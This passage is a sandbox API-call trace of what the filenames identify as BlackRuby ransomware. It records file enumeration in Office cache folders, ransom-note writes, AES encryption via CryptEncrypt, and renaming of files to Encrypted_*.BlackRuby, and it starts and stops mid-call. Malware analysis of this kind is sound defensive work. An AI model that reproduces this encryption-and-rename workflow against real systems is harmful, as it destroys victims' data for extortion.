lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-0000-0000000FF1CE}-C\\Encrypted_roRWX8skE7ALb6JIHMEc6aWrQ8ORQZuZ6vXsQQlftYocO.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-0000-0000000ff1ce}-c\\encrypted_rorwx8ske7alb6jihmec6awrq8orqzuz6vxsqqlftyoco.blackruby")) returned 1 [0046.535] GetLastError () returned 0xb7 [0046.536] SetErrorMode (uMode=0x0) returned 0x1 [0046.536] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.536] GetLastError () returned 0x5 [0046.536] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.537] GetLastError () returned 0x5 [0046.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.537] GetLastError () returned 0x5 [0046.537] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.537] GetLastError () returned 0x5 [0046.537] SetErrorMode (uMode=0x1) returned 0x0 [0046.537] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d20 [0046.545] GetLastError () returned 0x5 [0046.546] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.546] GetLastError () returned 0x5 [0046.546] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.546] GetLastError () returned 0x5 [0046.546] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.546] GetLastError () returned 0x5 [0046.546] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.546] GetLastError () returned 0x5 [0046.546] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.546] GetLastError () returned 0x5 [0046.546] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.546] GetLastError () returned 0x12 [0046.546] FindClose (in: hFindFile=0x360d20 | out: hFindFile=0x360d20) returned 1 [0046.547] SetErrorMode (uMode=0x0) returned 0x1 [0046.547] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.547] GetLastError () returned 0x12 [0046.547] SetErrorMode (uMode=0x1) returned 0x0 [0046.547] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d20 [0046.548] GetLastError () returned 0x12 [0046.548] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.548] GetLastError () returned 0x12 [0046.548] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.548] GetLastError () returned 0x12 [0046.548] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.548] GetLastError () returned 0x12 [0046.549] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.549] GetLastError () returned 0x12 [0046.549] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.549] GetLastError () returned 0x12 [0046.549] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.549] GetLastError () returned 0x12 [0046.549] FindClose (in: hFindFile=0x360d20 | out: hFindFile=0x360d20) returned 1 [0046.550] SetErrorMode (uMode=0x0) returned 0x1 [0046.550] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveLR.cab", lpFilePart=0x0) returned 0x4b [0046.550] GetLastError () returned 0x12 [0046.550] SetErrorMode (uMode=0x1) returned 0x0 [0046.550] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\groovelr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd0f5c | out: lpFileInformation=0x1cd0f5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a3f6500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x1a3f6500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x365ae5d0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x3e7d3d)) returned 1 [0046.551] GetLastError () returned 0x12 [0046.551] SetErrorMode (uMode=0x0) returned 0x1 [0046.552] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.552] GetLastError () returned 0x12 [0046.552] SetErrorMode (uMode=0x1) returned 0x0 [0046.552] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.552] GetLastError () returned 0x0 [0046.552] GetFileType (hFile=0x184) returned 0x1 [0046.552] SetErrorMode (uMode=0x0) returned 0x1 [0046.552] GetFileType (hFile=0x184) returned 0x1 [0046.552] WriteFile (in: hFile=0x184, lpBuffer=0x1cec94c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1cec94c*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0046.553] GetLastError () returned 0x0 [0046.553] CloseHandle (hObject=0x184) returned 1 [0046.553] GetLastError () returned 0x0 [0046.553] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.553] GetLastError () returned 0x0 [0046.553] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0046.554] GetLastError () returned 0x0 [0046.554] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.msi", lpFilePart=0x0) returned 0x4c [0046.554] GetLastError () returned 0x0 [0046.554] SetErrorMode (uMode=0x1) returned 0x0 [0046.554] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\groovemui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1cee658 | out: lpFileInformation=0x1cee658*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20354600, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x20354600, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36300540, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1b8a00)) returned 1 [0046.554] GetLastError () returned 0x0 [0046.554] SetErrorMode (uMode=0x0) returned 0x1 [0046.554] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.554] GetLastError () returned 0x0 [0046.554] SetErrorMode (uMode=0x1) returned 0x0 [0046.554] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.555] GetLastError () returned 0x5 [0046.556] SetErrorMode (uMode=0x0) returned 0x1 [0046.556] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0046.556] GetLastError () returned 0x5 [0046.556] SetErrorMode (uMode=0x1) returned 0x0 [0046.556] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1d0c448 | out: lpFileInformation=0x1d0c448*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36300540, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x391)) returned 1 [0046.556] GetLastError () returned 0x5 [0046.556] SetErrorMode (uMode=0x0) returned 0x1 [0046.557] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0046.557] GetLastError () returned 0x5 [0046.557] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0046.557] GetLastError () returned 0x5 [0046.557] SetErrorMode (uMode=0x1) returned 0x0 [0046.557] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.557] GetLastError () returned 0x0 [0046.557] GetFileType (hFile=0x184) returned 0x1 [0046.557] SetErrorMode (uMode=0x0) returned 0x1 [0046.557] GetFileType (hFile=0x184) returned 0x1 [0046.557] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x391 [0046.557] GetLastError () returned 0x0 [0046.557] ReadFile (in: hFile=0x184, lpBuffer=0x1d0e504, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d0e504*, lpNumberOfBytesRead=0x18ed84*=0x391, lpOverlapped=0x0) returned 1 [0046.565] GetLastError () returned 0x0 [0046.565] CloseHandle (hObject=0x184) returned 1 [0046.565] GetLastError () returned 0x0 [0046.565] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0046.565] GetLastError () returned 0x0 [0046.565] SetErrorMode (uMode=0x1) returned 0x0 [0046.565] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36300540, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x391)) returned 1 [0046.565] GetLastError () returned 0x0 [0046.565] SetErrorMode (uMode=0x0) returned 0x1 [0046.565] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0046.565] GetLastError () returned 0x0 [0046.598] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b6afec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f60) returned 1 [0046.598] GetLastError () returned 0x0 [0046.598] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.598] GetLastError () returned 0x0 [0046.604] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.604] GetLastError () returned 0x0 [0046.604] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d60) returned 1 [0046.604] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.604] GetLastError () returned 0x0 [0046.604] CryptSetKeyParam (hKey=0x360d60, dwParam=0x4, pbData=0x1b98038*=0x1, dwFlags=0x0) returned 1 [0046.604] GetLastError () returned 0x0 [0046.605] CryptSetKeyParam (hKey=0x360d60, dwParam=0x1, pbData=0x1b98004, dwFlags=0x0) returned 1 [0046.605] GetLastError () returned 0x0 [0046.605] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b98080*, pdwDataLen=0x18ed74*=0x490, dwBufLen=0x490 | out: pbData=0x1b98080*, pdwDataLen=0x18ed74*=0x490) returned 1 [0046.605] GetLastError () returned 0x0 [0046.605] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b989cc*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b989cc*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.605] GetLastError () returned 0x0 [0046.605] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b989fc*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b989fc*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.605] GetLastError () returned 0x0 [0046.605] CryptDestroyKey (hKey=0x360f60) returned 1 [0046.605] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.605] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.605] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0046.605] GetLastError () returned 0x0 [0046.605] SetErrorMode (uMode=0x1) returned 0x0 [0046.605] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.606] GetLastError () returned 0xb7 [0046.606] GetFileType (hFile=0x184) returned 0x1 [0046.606] SetErrorMode (uMode=0x0) returned 0x1 [0046.606] GetFileType (hFile=0x184) returned 0x1 [0046.607] CloseHandle (hObject=0x184) returned 1 [0046.607] GetLastError () returned 0xb7 [0046.607] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0046.607] GetLastError () returned 0xb7 [0046.607] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Encrypted_efTkcASZZjre4yf4QdRrcWwTeWVQGvISGLZoSTSk.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Encrypted_efTkcASZZjre4yf4QdRrcWwTeWVQGvISGLZoSTSk.BlackRuby", lpFilePart=0x0) returned 0x7b [0046.607] GetLastError () returned 0xb7 [0046.607] SetErrorMode (uMode=0x1) returned 0x0 [0046.607] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23fbbde0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4a0)) returned 1 [0046.608] GetLastError () returned 0xb7 [0046.608] SetErrorMode (uMode=0x0) returned 0x1 [0046.608] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Encrypted_efTkcASZZjre4yf4QdRrcWwTeWVQGvISGLZoSTSk.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\encrypted_eftkcaszzjre4yf4qdrrcwwtewvqgvisglzostsk.blackruby")) returned 1 [0046.608] GetLastError () returned 0xb7 [0046.608] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.608] GetLastError () returned 0xb7 [0046.608] SetErrorMode (uMode=0x1) returned 0x0 [0046.608] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.608] GetLastError () returned 0x5 [0046.609] SetErrorMode (uMode=0x0) returned 0x1 [0046.609] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.609] GetLastError () returned 0x5 [0046.609] SetErrorMode (uMode=0x1) returned 0x0 [0046.609] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1bb7cf8 | out: lpFileInformation=0x1bb7cf8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x365d56d0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x5ac)) returned 1 [0046.610] GetLastError () returned 0x5 [0046.610] SetErrorMode (uMode=0x0) returned 0x1 [0046.610] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.610] GetLastError () returned 0x5 [0046.610] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.610] GetLastError () returned 0x5 [0046.610] SetErrorMode (uMode=0x1) returned 0x0 [0046.610] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.610] GetLastError () returned 0x0 [0046.610] GetFileType (hFile=0x184) returned 0x1 [0046.610] SetErrorMode (uMode=0x0) returned 0x1 [0046.610] GetFileType (hFile=0x184) returned 0x1 [0046.610] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x5ac [0046.610] GetLastError () returned 0x0 [0046.610] ReadFile (in: hFile=0x184, lpBuffer=0x1bba4bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bba4bc*, lpNumberOfBytesRead=0x18ed84*=0x5ac, lpOverlapped=0x0) returned 1 [0046.612] GetLastError () returned 0x0 [0046.612] CloseHandle (hObject=0x184) returned 1 [0046.612] GetLastError () returned 0x0 [0046.612] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.612] GetLastError () returned 0x0 [0046.612] SetErrorMode (uMode=0x1) returned 0x0 [0046.612] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x365d56d0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x5ac)) returned 1 [0046.612] GetLastError () returned 0x0 [0046.612] SetErrorMode (uMode=0x0) returned 0x1 [0046.612] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0046.612] GetLastError () returned 0x0 [0046.648] CryptImportKey (in: hProv=0x37c680, pbData=0x1c15e40, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360e60) returned 1 [0046.648] GetLastError () returned 0x0 [0046.648] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.648] GetLastError () returned 0x0 [0046.653] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.653] GetLastError () returned 0x0 [0046.653] CryptDuplicateKey (in: hKey=0x360e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360de0) returned 1 [0046.653] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.653] GetLastError () returned 0x0 [0046.653] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1c42e8c*=0x1, dwFlags=0x0) returned 1 [0046.653] GetLastError () returned 0x0 [0046.653] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1c42e58, dwFlags=0x0) 